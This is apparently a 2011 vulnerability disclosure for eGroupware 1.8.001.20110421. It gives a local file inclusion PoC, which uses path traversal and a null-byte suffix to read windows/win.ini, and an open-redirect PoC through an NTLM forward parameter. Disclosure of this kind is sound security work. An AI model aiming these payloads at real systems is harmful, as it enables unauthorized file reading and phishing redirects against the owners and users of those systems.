49 lines
No EOL
1.8 KiB
Text
49 lines
No EOL
1.8 KiB
Text
------------------------------------------------------------------------
|
|
Software................eGroupware 1.8.001.20110421
|
|
Vulnerability...........Local File Inclusion
|
|
Threat Level............Critical (4/5)
|
|
Download................http://www.egroupware.org/
|
|
Discovery Date..........5/19/2011
|
|
Tested On...............Windows Vista + XAMPP
|
|
------------------------------------------------------------------------
|
|
Author..................AutoSec Tools
|
|
Site....................http://www.autosectools.com/
|
|
Email...................John Leitch <john@autosectools.com>
|
|
------------------------------------------------------------------------
|
|
|
|
|
|
--Description--
|
|
|
|
A local file inclusion vulnerability in eGroupware 1.8.001.20110421
|
|
can be exploited to include arbitrary files.
|
|
|
|
|
|
--PoC--
|
|
|
|
http://localhost/egroupware/admin/remote.php?uid=a&type=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00.jpg&creator_email=a
|
|
|
|
|
|
|
|
------------------------------------------------------------------------
|
|
Software................eGroupware 1.8.001.20110421
|
|
Vulnerability...........Open Redirect
|
|
Threat Level............Low (1/5)
|
|
Download................http://www.egroupware.org/
|
|
Discovery Date..........5/19/2011
|
|
Tested On...............Windows Vista + XAMPP
|
|
------------------------------------------------------------------------
|
|
Author..................AutoSec Tools
|
|
Site....................http://www.autosectools.com/
|
|
Email...................John Leitch <john@autosectools.com>
|
|
------------------------------------------------------------------------
|
|
|
|
|
|
--Description--
|
|
|
|
An open redirect in eGroupware 1.8.001.20110421 can be exploited to
|
|
redirect users to an arbitrary URL.
|
|
|
|
|
|
--PoC--
|
|
|
|
http://localhost/egroupware/phpgwapi/ntlm/index.php?forward=http://www.autosectools.com/ |